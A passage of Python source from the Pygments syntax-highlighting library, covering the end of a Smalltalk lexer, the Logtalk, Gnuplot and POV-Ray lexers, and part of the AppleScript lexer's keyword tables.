# This state is a bit tricky since # we can't just pop this state (r'\)', String.Symbol, ('root', 'afterobject')), include('_parenth_helper'), ], 'inner_parenth': [ (r'\)', String.Symbol, '#pop'), include('_parenth_helper'), ], 'whitespaces' : [ # skip whitespace and comments (r'\s+', Text), (r'"(""|[^"])*"', Comment), ], 'objects' : [ (r'\[', Text, 'blockvariables'), (r'\]', Text, 'afterobject'), (r'\b(self|super|true|false|nil|thisContext)\b', Name.Builtin.Pseudo, 'afterobject'), (r'\b[A-Z]\w*(?!:)\b', Name.Class, 'afterobject'), (r'\b[a-z]\w*(?!:)\b', Name.Variable, 'afterobject'), (r'#("(""|[^"])*"|[-+*/\\~<>=|&!?,@%]+|[\w:]+)', String.Symbol, 'afterobject'), include('literals'), ], 'afterobject' : [ (r'! !$', Keyword , '#pop'), # squeak chunk delimiter include('whitespaces'), (r'\b(ifTrue:|ifFalse:|whileTrue:|whileFalse:|timesRepeat:)', Name.Builtin, '#pop'), (r'\b(new\b(?!:))', Name.Builtin), (r'\:=|\_', Operator, '#pop'), (r'\b[a-zA-Z]+\w*:', Name.Function, '#pop'), (r'\b[a-zA-Z]+\w*', Name.Function), (r'\w+:?|[-+*/\\~<>=|&!?,@%]+', Name.Function, '#pop'), (r'\.', Punctuation, '#pop'), (r';', Punctuation), (r'[\])}]', Text), (r'[\[({]', Text, '#pop'), ], 'squeak fileout' : [ # Squeak fileout format (optional) (r'^"(""|[^"])*"!', Keyword), (r"^'(''|[^'])*'!", Keyword), (r'^(!)(\w+)( commentStamp: )(.*?)( prior: .*?!\n)(.*?)(!)', bygroups(Keyword, Name.Class, Keyword, String, Keyword, Text, Keyword)), (r"^(!)(\w+(?: class)?)( methodsFor: )('(?:''|[^'])*')(.*?!)", bygroups(Keyword, Name.Class, Keyword, String, Keyword)), (r'^(\w+)( subclass: )(#\w+)' r'(\s+instanceVariableNames: )(.*?)' r'(\s+classVariableNames: )(.*?)' r'(\s+poolDictionaries: )(.*?)' r'(\s+category: )(.*?)(!)', bygroups(Name.Class, Keyword, String.Symbol, Keyword, String, Keyword, String, Keyword, String, Keyword, String, Keyword)), (r'^(\w+(?: class)?)(\s+instanceVariableNames: )(.*?)(!)', bygroups(Name.Class, Keyword, String, Keyword)), (r'(!\n)(\].*)(! !)$', bygroups(Keyword, Text, Keyword)), (r'! !$', Keyword), ], } class LogtalkLexer(RegexLexer): """ For `Logtalk <http://logtalk.org/>`_ source code. *New in Pygments 0.10.* """ name = 'Logtalk' aliases = ['logtalk'] filenames = ['*.lgt'] mimetypes = ['text/x-logtalk'] tokens = { 'root': [ # Directives (r'^\s*:-\s',Punctuation,'directive'), # Comments (r'%.*?\n', Comment), (r'/\*(.|\n)*?\*/',Comment), # Whitespace (r'\n', Text), (r'\s+', Text), # Numbers (r"0'.", Number), (r'0b[01]+', Number), (r'0o[0-7]+', Number), (r'0x[0-9a-fA-F]+', Number), (r'\d+\.?\d*((e|E)(\+|-)?\d+)?', Number), # Variables (r'([A-Z_][a-zA-Z0-9_]*)', Name.Variable), # Event handlers (r'(after|before)(?=[(])', Keyword), # Execution-context methods (r'(parameter|this|se(lf|nder))(?=[(])', Keyword), # Reflection (r'(current_predicate|predicate_property)(?=[(])', Keyword), # DCGs and term expansion (r'(expand_(goal|term)|(goal|term)_expansion|phrase)(?=[(])', Keyword), # Entity (r'(abolish|c(reate|urrent))_(object|protocol|category)(?=[(])', Keyword), (r'(object|protocol|category)_property(?=[(])', Keyword), # Entity relations (r'co(mplements_object|nforms_to_protocol)(?=[(])', Keyword), (r'extends_(object|protocol|category)(?=[(])', Keyword), (r'imp(lements_protocol|orts_category)(?=[(])', Keyword), (r'(instantiat|specializ)es_class(?=[(])', Keyword), # Events (r'(current_event|(abolish|define)_events)(?=[(])', Keyword), # Flags (r'(current|set)_logtalk_flag(?=[(])', Keyword), # Compiling, loading, and library paths (r'logtalk_(compile|l(ibrary_path|oad_context|oad))(?=[(])', Keyword), # Database (r'(clause|retract(all)?)(?=[(])', Keyword), (r'a(bolish|ssert(a|z))(?=[(])', Keyword), # Control constructs (r'(ca(ll|tch)|throw)(?=[(])', Keyword), (r'(fail|true)\b', Keyword), # All solutions (r'((bag|set)of|f(ind|or)all)(?=[(])', Keyword), # Multi-threading meta-predicates (r'threaded(_(call|once|ignore|exit|peek|wait|notify))?(?=[(])', Keyword), # Term unification (r'unify_with_occurs_check(?=[(])', Keyword), # Term creation and decomposition (r'(functor|arg|copy_term|numbervars)(?=[(])', Keyword), # Evaluable functors (r'(rem|mod|abs|sign)(?=[(])', Keyword), (r'float(_(integer|fractional)_part)?(?=[(])', Keyword), (r'(floor|truncate|round|ceiling)(?=[(])', Keyword), # Other arithmetic functors (r'(cos|atan|exp|log|s(in|qrt))(?=[(])', Keyword), # Term testing (r'(var|atom(ic)?|integer|float|c(allable|ompound)|n(onvar|umber)|' r'ground)(?=[(])', Keyword), # Term comparison (r'compare(?=[(])', Keyword), # Stream selection and control (r'(curren|se)t_(in|out)put(?=[(])', Keyword), (r'(open|close)(?=[(])', Keyword), (r'flush_output(?=[(])', Keyword), (r'(at_end_of_stream|flush_output)\b', Keyword), (r'(stream_property|at_end_of_stream|set_stream_position)(?=[(])', Keyword), # Character and byte input/output (r'(nl|(get|peek|put)_(byte|c(har|ode)))(?=[(])', Keyword), (r'\bnl\b', Keyword), # Term input/output (r'read(_term)?(?=[(])', Keyword), (r'write(q|_(canonical|term))?(?=[(])', Keyword), (r'(current_)?op(?=[(])', Keyword), (r'(current_)?char_conversion(?=[(])', Keyword), # Atomic term processing (r'atom_(length|c(hars|o(ncat|des)))(?=[(])', Keyword), (r'(char_code|sub_atom)(?=[(])', Keyword), (r'number_c(har|ode)s(?=[(])', Keyword), # Implementation defined hooks functions (r'(se|curren)t_prolog_flag(?=[(])', Keyword), (r'\bhalt\b', Keyword), (r'halt(?=[(])', Keyword), # Message sending operators (r'(::|:|\^\^)', Operator), # External call (r'[{}]', Keyword), # Logic and control (r'\b(ignore|once)(?=[(])', Keyword), (r'\brepeat\b', Keyword), # Sorting (r'(key)?sort(?=[(])', Keyword), # Bitwise functors (r'(>>|<<|/\\|\\\\|\\)', Operator), # Arithemtic evaluation (r'\bis\b', Keyword), # Arithemtic comparison (r'(=:=|=\\=|<|=<|>=|>)', Operator), # Term creation and decomposition (r'=\.\.', Operator), # Term unification (r'(=|\\=)', Operator), # Term comparison (r'(==|\\==|@=<|@<|@>=|@>)', Operator), # Evaluable functors (r'(//|[-+*/])', Operator), (r'\b(e|pi|mod|rem)\b', Operator), # Other arithemtic functors (r'\b\*\*\b', Operator), # DCG rules (r'-->', Operator), # Control constructs (r'([!;]|->)', Operator), # Logic and control (r'\\+', Operator), # Mode operators (r'[?@]', Operator), # Existential quantifier (r'\^', Operator), # Strings (r'"(\\\\|\\"|[^"])*"', String), # Ponctuation (r'[()\[\],.|]', Text), # Atoms (r"[a-z][a-zA-Z0-9_]*", Text), (r"'", String, 'quoted_atom'), ], 'quoted_atom': [ (r"''", String), (r"'", String, '#pop'), (r'\\([\\abfnrtv"\']|(x[a-fA-F0-9]+|[0-7]+)\\)', String.Escape), (r"[^\\'\n]+", String), (r'\\', String), ], 'directive': [ # Conditional compilation directives (r'(el)?if(?=[(])', Keyword, 'root'), (r'(e(lse|ndif))[.]', Keyword, 'root'), # Entity directives (r'(category|object|protocol)(?=[(])', Keyword, 'entityrelations'), (r'(end_(category|object|protocol))[.]',Keyword, 'root'), # Predicate scope directives (r'(public|protected|private)(?=[(])', Keyword, 'root'), # Other directives (r'e(n(coding|sure_loaded)|xport)(?=[(])', Keyword, 'root'), (r'in(fo|itialization)(?=[(])', Keyword, 'root'), (r'(dynamic|synchronized|threaded)[.]', Keyword, 'root'), (r'(alias|d(ynamic|iscontiguous)|m(eta_predicate|ode|ultifile)|' r's(et_(logtalk|prolog)_flag|ynchronized))(?=[(])', Keyword, 'root'), (r'op(?=[(])', Keyword, 'root'), (r'(c(alls|oinductive)|reexport|use(s|_module))(?=[(])', Keyword, 'root'), (r'[a-z][a-zA-Z0-9_]*(?=[(])', Text, 'root'), (r'[a-z][a-zA-Z0-9_]*[.]', Text, 'root'), ], 'entityrelations': [ (r'(complements|extends|i(nstantiates|mp(lements|orts))|specializes)' r'(?=[(])', Keyword), # Numbers (r"0'.", Number), (r'0b[01]+', Number), (r'0o[0-7]+', Number), (r'0x[0-9a-fA-F]+', Number), (r'\d+\.?\d*((e|E)(\+|-)?\d+)?', Number), # Variables (r'([A-Z_][a-zA-Z0-9_]*)', Name.Variable), # Atoms (r"[a-z][a-zA-Z0-9_]*", Text), (r"'", String, 'quoted_atom'), # Strings (r'"(\\\\|\\"|[^"])*"', String), # End of entity-opening directive (r'([)]\.)', Text, 'root'), # Scope operator (r'(::)', Operator), # Ponctuation (r'[()\[\],.|]', Text), # Comments (r'%.*?\n', Comment), (r'/\*(.|\n)*?\*/',Comment), # Whitespace (r'\n', Text), (r'\s+', Text), ] } def analyse_text(text): if ':- object(' in text: return True if ':- protocol(' in text: return True if ':- category(' in text: return True return False def _shortened(word): dpos = word.find('$') return '|'.join([word[:dpos] + word[dpos+1:i] + r'\b' for i in range(len(word), dpos, -1)]) def _shortened_many(*words): return '|'.join(map(_shortened, words)) class GnuplotLexer(RegexLexer): """ For `Gnuplot <http://gnuplot.info/>`_ plotting scripts. *New in Pygments 0.11.* """ name = 'Gnuplot' aliases = ['gnuplot'] filenames = ['*.plot', '*.plt'] mimetypes = ['text/x-gnuplot'] tokens = { 'root': [ include('whitespace'), (_shortened('bi$nd'), Keyword, 'bind'), (_shortened_many('ex$it', 'q$uit'), Keyword, 'quit'), (_shortened('f$it'), Keyword, 'fit'), (r'(if)(\s*)(\()', bygroups(Keyword, Text, Punctuation), 'if'), (r'else\b', Keyword), (_shortened('pa$use'), Keyword, 'pause'), (_shortened_many('p$lot', 'rep$lot', 'sp$lot'), Keyword, 'plot'), (_shortened('sa$ve'), Keyword, 'save'), (_shortened('se$t'), Keyword, ('genericargs', 'optionarg')), (_shortened_many('sh$ow', 'uns$et'), Keyword, ('noargs', 'optionarg')), (_shortened_many('low$er', 'ra$ise', 'ca$ll', 'cd$', 'cl$ear', 'h$elp', '\\?$', 'hi$story', 'l$oad', 'pr$int', 'pwd$', 're$read', 'res$et', 'scr$eendump', 'she$ll', 'sy$stem', 'up$date'), Keyword, 'genericargs'), (_shortened_many('pwd$', 're$read', 'res$et', 'scr$eendump', 'she$ll', 'test$'), Keyword, 'noargs'), ('([a-zA-Z_][a-zA-Z0-9_]*)(\s*)(=)', bygroups(Name.Variable, Text, Operator), 'genericargs'), ('([a-zA-Z_][a-zA-Z0-9_]*)(\s*\(.*?\)\s*)(=)', bygroups(Name.Function, Text, Operator), 'genericargs'), (r'@[a-zA-Z_][a-zA-Z0-9_]*', Name.Constant), # macros (r';', Keyword), ], 'comment': [ (r'[^\\\n]', Comment), (r'\\\n', Comment), (r'\\', Comment), # don't add the newline to the Comment token ('', Comment, '#pop'), ], 'whitespace': [ ('#', Comment, 'comment'), (r'[ \t\v\f]+', Text), ], 'noargs': [ include('whitespace'), # semicolon and newline end the argument list (r';', Punctuation, '#pop'), (r'\n', Text, '#pop'), ], 'dqstring': [ (r'"', String, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), (r'[^\\"\n]+', String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # stray backslash (r'\n', String, '#pop'), # newline ends the string too ], 'sqstring': [ (r"''", String), # escaped single quote (r"'", String, '#pop'), (r"[^\\'\n]+", String), # all other characters (r'\\\n', String), # line continuation (r'\\', String), # normal backslash (r'\n', String, '#pop'), # newline ends the string too ], 'genericargs': [ include('noargs'), (r'"', String, 'dqstring'), (r"'", String, 'sqstring'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+', Number.Float), (r'(\d+\.\d*|\.\d+)', Number.Float), (r'-?\d+', Number.Integer), ('[,.~!%^&*+=|?:<>/-]', Operator), ('[{}()\[\]]', Punctuation), (r'(eq|ne)\b', Operator.Word), (r'([a-zA-Z_][a-zA-Z0-9_]*)(\s*)(\()', bygroups(Name.Function, Text, Punctuation)), (r'[a-zA-Z_][a-zA-Z0-9_]*', Name), (r'@[a-zA-Z_][a-zA-Z0-9_]*', Name.Constant), # macros (r'\\\n', Text), ], 'optionarg': [ include('whitespace'), (_shortened_many( "a$ll","an$gles","ar$row","au$toscale","b$ars","bor$der", "box$width","cl$abel","c$lip","cn$trparam","co$ntour","da$ta", "data$file","dg$rid3d","du$mmy","enc$oding","dec$imalsign", "fit$","font$path","fo$rmat","fu$nction","fu$nctions","g$rid", "hid$den3d","his$torysize","is$osamples","k$ey","keyt$itle", "la$bel","li$nestyle","ls$","loa$dpath","loc$ale","log$scale", "mac$ros","map$ping","map$ping3d","mar$gin","lmar$gin", "rmar$gin","tmar$gin","bmar$gin","mo$use","multi$plot", "mxt$ics","nomxt$ics","mx2t$ics","nomx2t$ics","myt$ics", "nomyt$ics","my2t$ics","nomy2t$ics","mzt$ics","nomzt$ics", "mcbt$ics","nomcbt$ics","of$fsets","or$igin","o$utput", "pa$rametric","pm$3d","pal$ette","colorb$ox","p$lot", "poi$ntsize","pol$ar","pr$int","obj$ect","sa$mples","si$ze", "st$yle","su$rface","table$","t$erminal","termo$ptions","ti$cs", "ticsc$ale","ticsl$evel","timef$mt","tim$estamp","tit$le", "v$ariables","ve$rsion","vi$ew","xyp$lane","xda$ta","x2da$ta", "yda$ta","y2da$ta","zda$ta","cbda$ta","xl$abel","x2l$abel", "yl$abel","y2l$abel","zl$abel","cbl$abel","xti$cs","noxti$cs", "x2ti$cs","nox2ti$cs","yti$cs","noyti$cs","y2ti$cs","noy2ti$cs", "zti$cs","nozti$cs","cbti$cs","nocbti$cs","xdti$cs","noxdti$cs", "x2dti$cs","nox2dti$cs","ydti$cs","noydti$cs","y2dti$cs", "noy2dti$cs","zdti$cs","nozdti$cs","cbdti$cs","nocbdti$cs", "xmti$cs","noxmti$cs","x2mti$cs","nox2mti$cs","ymti$cs", "noymti$cs","y2mti$cs","noy2mti$cs","zmti$cs","nozmti$cs", "cbmti$cs","nocbmti$cs","xr$ange","x2r$ange","yr$ange", "y2r$ange","zr$ange","cbr$ange","rr$ange","tr$ange","ur$ange", "vr$ange","xzeroa$xis","x2zeroa$xis","yzeroa$xis","y2zeroa$xis", "zzeroa$xis","zeroa$xis","z$ero"), Name.Builtin, '#pop'), ], 'bind': [ ('!', Keyword, '#pop'), (_shortened('all$windows'), Name.Builtin), include('genericargs'), ], 'quit': [ (r'gnuplot\b', Keyword), include('noargs'), ], 'fit': [ (r'via\b', Name.Builtin), include('plot'), ], 'if': [ (r'\)', Punctuation, '#pop'), include('genericargs'), ], 'pause': [ (r'(mouse|any|button1|button2|button3)\b', Name.Builtin), (_shortened('key$press'), Name.Builtin), include('genericargs'), ], 'plot': [ (_shortened_many('ax$es', 'axi$s', 'bin$ary', 'ev$ery', 'i$ndex', 'mat$rix', 's$mooth', 'thru$', 't$itle', 'not$itle', 'u$sing', 'w$ith'), Name.Builtin), include('genericargs'), ], 'save': [ (_shortened_many('f$unctions', 's$et', 't$erminal', 'v$ariables'), Name.Builtin), include('genericargs'), ], } class PovrayLexer(RegexLexer): """ For `Persistence of Vision Raytracer <http://www.povray.org/>`_ files. *New in Pygments 0.11.* """ name = 'POVRay' aliases = ['pov'] filenames = ['*.pov', '*.inc'] mimetypes = ['text/x-povray'] tokens = { 'root': [ (r'/\*[\w\W]*?\*/', Comment.Multiline), (r'//.*\n', Comment.Single), (r'(?s)"(?:\\.|[^"\\])+"', String.Double), (r'#(debug|default|else|end|error|fclose|fopen|ifdef|ifndef|' r'include|range|read|render|statistics|switch|undef|version|' r'warning|while|write|define|macro|local|declare)\b', Comment.Preproc), (r'\b(aa_level|aa_threshold|abs|acos|acosh|adaptive|adc_bailout|' r'agate|agate_turb|all|alpha|ambient|ambient_light|angle|' r'aperture|arc_angle|area_light|asc|asin|asinh|assumed_gamma|' r'atan|atan2|atanh|atmosphere|atmospheric_attenuation|' r'attenuating|average|background|black_hole|blue|blur_samples|' r'bounded_by|box_mapping|bozo|break|brick|brick_size|' r'brightness|brilliance|bumps|bumpy1|bumpy2|bumpy3|bump_map|' r'bump_size|case|caustics|ceil|checker|chr|clipped_by|clock|' r'color|color_map|colour|colour_map|component|composite|concat|' r'confidence|conic_sweep|constant|control0|control1|cos|cosh|' r'count|crackle|crand|cube|cubic_spline|cylindrical_mapping|' r'debug|declare|default|degrees|dents|diffuse|direction|' r'distance|distance_maximum|div|dust|dust_type|eccentricity|' r'else|emitting|end|error|error_bound|exp|exponent|' r'fade_distance|fade_power|falloff|falloff_angle|false|' r'file_exists|filter|finish|fisheye|flatness|flip|floor|' r'focal_point|fog|fog_alt|fog_offset|fog_type|frequency|gif|' r'global_settings|glowing|gradient|granite|gray_threshold|' r'green|halo|hexagon|hf_gray_16|hierarchy|hollow|hypercomplex|' r'if|ifdef|iff|image_map|incidence|include|int|interpolate|' r'inverse|ior|irid|irid_wavelength|jitter|lambda|leopard|' r'linear|linear_spline|linear_sweep|location|log|looks_like|' r'look_at|low_error_factor|mandel|map_type|marble|material_map|' r'matrix|max|max_intersections|max_iteration|max_trace_level|' r'max_value|metallic|min|minimum_reuse|mod|mortar|' r'nearest_count|no|normal|normal_map|no_shadow|number_of_waves|' r'octaves|off|offset|omega|omnimax|on|once|onion|open|' r'orthographic|panoramic|pattern1|pattern2|pattern3|' r'perspective|pgm|phase|phong|phong_size|pi|pigment|' r'pigment_map|planar_mapping|png|point_at|pot|pow|ppm|' r'precision|pwr|quadratic_spline|quaternion|quick_color|' r'quick_colour|quilted|radial|radians|radiosity|radius|rainbow|' r'ramp_wave|rand|range|reciprocal|recursion_limit|red|' r'reflection|refraction|render|repeat|rgb|rgbf|rgbft|rgbt|' r'right|ripples|rotate|roughness|samples|scale|scallop_wave|' r'scattering|seed|shadowless|sin|sine_wave|sinh|sky|sky_sphere|' r'slice|slope_map|smooth|specular|spherical_mapping|spiral|' r'spiral1|spiral2|spotlight|spotted|sqr|sqrt|statistics|str|' r'strcmp|strength|strlen|strlwr|strupr|sturm|substr|switch|sys|' r't|tan|tanh|test_camera_1|test_camera_2|test_camera_3|' r'test_camera_4|texture|texture_map|tga|thickness|threshold|' r'tightness|tile2|tiles|track|transform|translate|transmit|' r'triangle_wave|true|ttf|turbulence|turb_depth|type|' r'ultra_wide_angle|up|use_color|use_colour|use_index|u_steps|' r'val|variance|vaxis_rotate|vcross|vdot|version|vlength|' r'vnormalize|volume_object|volume_rendered|vol_with_light|' r'vrotate|v_steps|warning|warp|water_level|waves|while|width|' r'wood|wrinkles|yes)\b', Keyword), (r'(bicubic_patch|blob|box|camera|cone|cubic|cylinder|difference|' r'disc|height_field|intersection|julia_fractal|lathe|' r'light_source|merge|mesh|object|plane|poly|polygon|prism|' r'quadric|quartic|smooth_triangle|sor|sphere|superellipsoid|' r'text|torus|triangle|union)\b', Name.Builtin), # TODO: <=, etc (r'[\[\](){}<>;,]', Punctuation), (r'[-+*/=]', Operator), (r'\b(x|y|z|u|v)\b', Name.Builtin.Pseudo), (r'[a-zA-Z_][a-zA-Z_0-9]*', Name), (r'[0-9]+\.[0-9]*', Number.Float), (r'\.[0-9]+', Number.Float), (r'[0-9]+', Number.Integer), (r'\s+', Text), ] } class AppleScriptLexer(RegexLexer): """ For `AppleScript source code <http://developer.apple.com/documentation/AppleScript/ Conceptual/AppleScriptLangGuide>`_, including `AppleScript Studio <http://developer.apple.com/documentation/AppleScript/ Reference/StudioReference>`_. Contributed by Andreas Amann <aamann@mac.com>. """ name = 'AppleScript' aliases = ['applescript'] filenames = ['*.applescript'] flags = re.MULTILINE | re.DOTALL Identifiers = r'[a-zA-Z]\w*' Literals = ['AppleScript', 'current application', 'false', 'linefeed', 'missing value', 'pi','quote', 'result', 'return', 'space', 'tab', 'text item delimiters', 'true', 'version'] Classes = ['alias ', 'application ', 'boolean ', 'class ', 'constant ', 'date ', 'file ', 'integer ', 'list ', 'number ', 'POSIX file ', 'real ', 'record ', 'reference ', 'RGB color ', 'script ', 'text ', 'unit types', '(?:Unicode )?text', 'string'] BuiltIn = ['attachment', 'attribute run', 'character', 'day', 'month', 'paragraph', 'word', 'year'] HandlerParams = ['about', 'above', 'against', 'apart from', 'around', 'aside from', 'at', 'below', 'beneath', 'beside', 'between', 'for', 'given', 'instead of', 'on', 'onto', 'out of', 'over', 'since'] Commands = ['ASCII (character|number)', 'activate', 'beep', 'choose URL', 'choose application', 'choose color', 'choose file( name)?', 'choose folder', 'choose from list', 'choose remote application', 'clipboard info', 'close( access)?', 'copy', 'count', 'current date', 'delay', 'delete', 'display (alert|dialog)', 'do shell script', 'duplicate', 'exists', 'get eof', 'get volume settings', 'info for', 'launch', 'list (disks|folder)', 'load script', 'log', 'make', 'mount volume', 'new', 'offset', 'open( (for access|location))?', 'path to', 'print', 'quit', 'random number', 'read', 'round', 'run( script)?', 'say', 'scripting components', 'set (eof|the clipboard to|volume)', 'store script', 'summarize', 'system attribute', 'system info', 'the clipboard', 'time to GMT', 'write', 'quoted form'] References = ['(in )?back of', '(in )?front of', '[0-9]+(st|nd|rd|th)', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth', 'after', 'back', 'before', 'behind', 'every', 'front', 'index', 'last', 'middle', 'some', 'that', 'through', 'thru', 'where', 'whose'] Operators = ["and", "or", "is equal", "equals", "(is )?equal to", "is not", "isn't", "isn't equal( to)?", "is not equal( to)?", "doesn't equal", "does not equal", "(is )?greater than", "comes after", "is not less than or equal( to)?", "isn't less than or equal( to)?", "(is )?less than", "comes before", "is not greater than or equal( to)?", "isn't greater than or equal( to)?", "(is )?greater than or equal( to)?", "is not less than", "isn't less than", "does not come before", "doesn't come before", "(is )?less than or equal( to)?", "is not greater than", "isn't greater than", "does not come after", "doesn't come after", "starts? with", "begins? with", "ends? with", "contains?", "does not contain", "doesn't contain", "is in", "is contained by", "is not in", "is not contained by", "isn't contained by", "div", "mod", "not", "(a )?(ref( to)?|reference to)", "is", "does"] Control = ['considering', 'else', 'error', 'exit', 'from', 'if', 'ignoring', 'in', 'repeat', 'tell', 'then', 'times', 'to', 'try', 'until', 'using terms from', 'while', 'whith', 'with timeout( of)?', 'with transaction', 'by', 'continue', 'end', 'its?', 'me', 'my', 'return', 'of' , 'as'] Declarations = ['global', 'local', 'prop(erty)?', 'set', 'get'] Reserved = ['but', 'put', 'returning', 'the'] StudioClasses = ['action cell', 'alert reply', 'application', 'box', 'browser( cell)?', 'bundle', 'button( cell)?', 'cell', 'clip view', 'color well', 'color-panel', 'combo box( item)?', 'control', 'data( (cell|column|item|row|source))?', 'default entry', 'dialog reply', 'document', 'drag info', 'drawer', 'event', 'font(-panel)?', 'formatter', 'image( (cell|view))?', 'matrix', 'menu( item)?', 'item', 'movie( view)?', 'open-panel', 'outline view', 'panel', 'pasteboard', 'plugin', 'popup button', 'progress indicator', 'responder', 'save-panel', 'scroll view', 'secure text field( cell)?', 'slider', 'sound', 'split view', 'stepper', 'tab view( item)?', 'table( (column|header cell|header view|view))', 'text( (field( cell)?|view))?', 'toolbar( item)?', 'user-defaults', 'view', 'window'] StudioEvents = ['accept outline drop', 'accept table drop', 'action', 'activated', 'alert ended', 'awake from nib', 'became key', 'became main', 'begin editing', 'bounds changed', 'cell value', 'cell value changed', 'change cell value', 'change item value', 'changed', 'child of item', 'choose menu item', 'clicked', 'clicked toolbar item', 'closed', 'column clicked', 'column moved', 'column resized', 'conclude drop', 'data representation', 'deminiaturized', 'dialog ended', 'document nib name', 'double clicked', 'drag( (entered|exited|updated))?', 'drop', 'end editing', 'exposed', 'idle', 'item expandable', 'item value', 'item value changed', 'items changed', 'keyboard down', 'keyboard up', 'launched', 'load data representation', 'miniaturized', 'mouse down', 'mouse dragged', 'mouse entered', 'mouse exited', 'mouse moved', 'mouse up', 'moved', 'number of browser rows', 'number of items', 'number of rows', 'open untitled', 'opened', 'panel ended', 'parameters updated', 'plugin loaded', 'prepare drop', 'prepare outline drag', 'prepare outline drop', 'prepare table drag', 'prepare table drop', 'read from file', 'resigned active', 'resigned key', 'resigned main', 'resized( sub views)?', 'right mouse down', 'right mouse dragged', 'right mouse up', 'rows changed', 'scroll wheel', 'selected tab view item', 'selection changed', 'selection changing', 'should begin editing', 'should close', 'should collapse item', 'should end editing', 'should expand item', 'should open( untitled)?', 'should quit( after last window closed)?', 'should select column', 'should select item', 'should select row', 'should select tab view item', 'should selection change', 'should zoom', 'shown', 'update menu item', 'update parameters', 'update toolbar item', 'was hidden', 'was miniaturized', 'will become active', 'will close', 'will dismiss', 'will display browser cell', 'will display cell', 'will display item cell', 'will display outline cell', 'will finish launching', 'will hide', 'will miniaturize', 'will move', 'will open', 'will pop up', 'will quit', 'will resign active', 'will resize( sub views)?', 'will select tab view item', 'will show', 'will zoom', 'write to file', 'zoomed'] StudioCommands = ['animate', 'append', 'call method', 'center', 'close drawer', 'close panel', 'display', 'display alert', 'display dialog', 'display panel', 'go', 'hide', 'highlight', 'increment', 'item for', 'load image', 'load movie', 'load nib', 'load panel', 'load sound', 'localized string', 'lock focus', 'log', 'open drawer', 'path for', 'pause', 'perform action', 'play', 'register', 'resume', 'scroll', 'select( all)?', 'show', 'size to fit', 'start', 'step back', 'step forward', 'stop', 'synchronize', 'unlock focus', 'update'] StudioProperties = ['accepts arrow key', 'action method', 'active', 'alignment', 'allowed identifiers', 'allows branch selection', 'allows column reordering', 'allows column resizing', 'allows column selection', 'allows customization', 'allows editing text attributes', 'allows empty selection', 'allows mixed state', 'allows multiple selection', 'allows reordering', 'allows undo', 'alpha( value)?', 'alternate image', 'alternate increment value', 'alternate title', 'animation delay', 'associated file name', 'associated object', 'auto completes', 'auto display', 'auto enables items', 'auto repeat', 'auto resizes( outline column)?', 'auto save expanded items', 'auto save name', 'auto save table columns', 'auto saves configuration', 'auto scroll', 'auto sizes all columns to fit', 'auto sizes cells', 'background color', 'bezel state', 'bezel style', 'bezeled', 'border rect', 'border type', 'bordered', 'bounds( rotation)?', 'box type', 'button returned', 'button type', 'can choose directories', 'can choose files', 'can draw', 'can hide', 'cell( (background color|size|type))?', 'characters', 'class', 'click count', 'clicked( data)? column', 'clicked data item', 'clicked( data)? row', 'closeable', 'collating', 'color( (mode|panel))', 'command key down', 'configuration', 'content(s| (size|view( margins)?))?', 'context', 'continuous', 'control key down', 'control size', 'control tint', 'control view', 'controller visible', 'coordinate system', 'copies( on scroll)?', 'corner view', 'current cell', 'current column', 'current( field)? editor', 'current( menu)? item', 'current row', 'current tab view item', 'data source', 'default identifiers', 'delta (x|y|z)', 'destination window', 'directory', 'display mode', 'displayed cell', 'document( (edited|rect|view))?', 'double value', 'dragged column', 'dragged distance', 'dragged items', 'draws( cell)? background', 'draws grid', 'dynamically scrolls', 'echos bullets', 'edge', 'editable', 'edited( data)? column', 'edited data item', 'edited( data)? row', 'enabled', 'enclosing scroll view', 'ending page', 'error handling', 'event number', 'event type', 'excluded from windows menu', 'executable path', 'expanded', 'fax number', 'field editor', 'file kind', 'file name', 'file type', 'first responder', 'first visible column', 'flipped', 'floating', 'font( panel)?', 'formatter', 'frameworks path', 'frontmost', 'gave up', 'grid color', 'has data items', 'has horizontal ruler', 'has horizontal scroller', 'has parent data item', 'has resize indicator', 'has shadow', 'has sub menu', 'has vertical ruler', 'has vertical scroller', 'header cell', 'header view', 'hidden', 'hides when deactivated', 'highlights by', 'horizontal line scroll', 'horizontal page scroll', 'horizontal ruler view', 'horizontally resizable', 'icon image', 'id', 'identifier', 'ignores multiple clicks', 'image( (alignment|dims when disabled|frame style|' 'scaling))?', 'imports graphics', 'increment value', 'indentation per level', 'indeterminate', 'index', 'integer value', 'intercell spacing', 'item height', 'key( (code|equivalent( modifier)?|window))?', 'knob thickness', 'label', 'last( visible)? column', 'leading offset', 'leaf', 'level', 'line scroll', 'loaded', 'localized sort', 'location', 'loop mode', 'main( (bunde|menu|window))?', 'marker follows cell', 'matrix mode', 'maximum( content)? size', 'maximum visible columns', 'menu( form representation)?', 'miniaturizable', 'miniaturized', 'minimized image', 'minimized title', 'minimum column width', 'minimum( content)? size', 'modal', 'modified', 'mouse down state', 'movie( (controller|file|rect))?', 'muted', 'name', 'needs display', 'next state', 'next text', 'number of tick marks', 'only tick mark values', 'opaque', 'open panel', 'option key down', 'outline table column', 'page scroll', 'pages across', 'pages down', 'palette label', 'pane splitter', 'parent data item', 'parent window', 'pasteboard', 'path( (names|separator))?', 'playing', 'plays every frame', 'plays selection only', 'position', 'preferred edge', 'preferred type', 'pressure', 'previous text', 'prompt', 'properties', 'prototype cell', 'pulls down', 'rate', 'released when closed', 'repeated', 'requested print time', 'required file type', 'resizable', 'resized column', 'resource path', 'returns records', 'reuses columns', 'rich text', 'roll over', 'row height', 'rulers visible', 'save panel', 'scripts path', 'scrollable', 'selectable( identifiers)?', 'selected cell', 'selected( data)? columns?', 'selected data items?', 'selected( data)? rows?', 'selected item identifier', 'selection by rect', 'send action on arrow key', 'sends action when done editing', 'separates columns', 'separator item', 'sequence number', 'services menu', 'shared frameworks path', 'shared support path', 'sheet', 'shift key down', 'shows alpha', 'shows state by', 'size( mode)?', 'smart insert delete enabled', 'sort case sensitivity', 'sort column', 'sort order', 'sort type', 'sorted( data rows)?', 'sound', 'source( mask)?', 'spell checking enabled', 'starting page', 'state', 'string value', 'sub menu', 'super menu', 'super view', 'tab key traverses cells', 'tab state', 'tab type', 'tab view', 'table view', 'tag', 'target( printer)?', 'text color', 'text container insert', 'text container origin', 'text returned', 'tick mark position', 'time stamp', 